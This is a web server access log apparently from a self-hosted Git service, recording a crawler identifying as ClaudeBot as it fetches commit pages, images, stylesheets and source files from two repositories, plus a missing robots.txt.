https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 10885] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 10886] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 10883] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 10889] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 10882] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 10881] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F63aec54418d3c1735d68bf046c7a9e78a247798d%2F.Backup%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:34:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2F.Backup%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images" [Client 216.73.216.188] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images" [Client 216.73.216.188] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 10883] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 10884] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:35:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 10884] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fletsencrypt.log.4" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fletsencrypt.log.6" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Fletsencrypt.log.7" [Client 216.73.216.188] [Length 4852] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fbranch%2Fmain%2Fnpm%2Fdata%2Flogs%2Ffallback_error.log" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:35:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fhtml%2Findex.html" [Client 216.73.216.188] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:35:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:36:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/normalizer" [Client 216.73.216.188] [Length 277] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:36:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/normalizer?display=source" [Client 216.73.216.188] [Length 11564] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:36:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/css/style.css" [Client 216.73.216.188] [Length 13195] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:36:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/css" [Client 216.73.216.188] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:36:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/normalizer" [Client 216.73.216.188] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:36:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services/geminiService.ts?display=source" [Client 216.73.216.188] [Length 13190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:37:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:37:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/normalizer?display=rendered" [Client 216.73.216.188] [Length 11022] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:37:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fhtml%2Fassets%2Fcss" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:37:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 9896] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:37:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 10882] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:37:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services/geminiService.ts?display=rendered" [Client 216.73.216.188] [Length 10946] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom4.png" [Client 216.73.216.188] [Length 10879] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:38:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom3.png" [Client 216.73.216.188] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:38:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom6.png" [Client 216.73.216.188] [Length 10880] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:38:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom5.png" [Client 216.73.216.188] [Length 10873] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:38:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images" [Client 216.73.216.188] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:38:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images/ControlRoom1.png" [Client 216.73.216.188] [Length 10878] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:39:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fhtml%2FREADME.md" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:39:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fhtml%2Fassets%2Fimages" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:39:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4846] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:39:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fhtml%2Findex.tsx" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:40:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F90c7377285c0e63de46467557a2f081b33097f03%2F.Backup%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:42:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:44:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:14:50:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommits%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:22:17 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 216.73.216.188] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:22:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/models.py?display=rendered" [Client 216.73.216.188] [Length 10964] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:22:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/models.py?display=source" [Client 216.73.216.188] [Length 13386] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:23:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/models.py" [Client 216.73.216.188] [Length 9935] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/models.py" [Client 216.73.216.188] [Length 2169] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:24:42 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/components/%7Bitem.href%7D" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/css" [Client 216.73.216.188] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:25:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/css/style.css?display=source" [Client 216.73.216.188] [Length 12679] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:25:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/css/style.css" [Client 216.73.216.188] [Length 20088] [Gzip 7.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:25:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/css/style.css" [Client 216.73.216.188] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:25:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/database.py?display=source" [Client 216.73.216.188] [Length 12339] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:25:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/database.py" [Client 216.73.216.188] [Length 753] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:15:25:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js/app.js" [Client 216.73.216.188] [Length 22026] [Gzip 6.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" 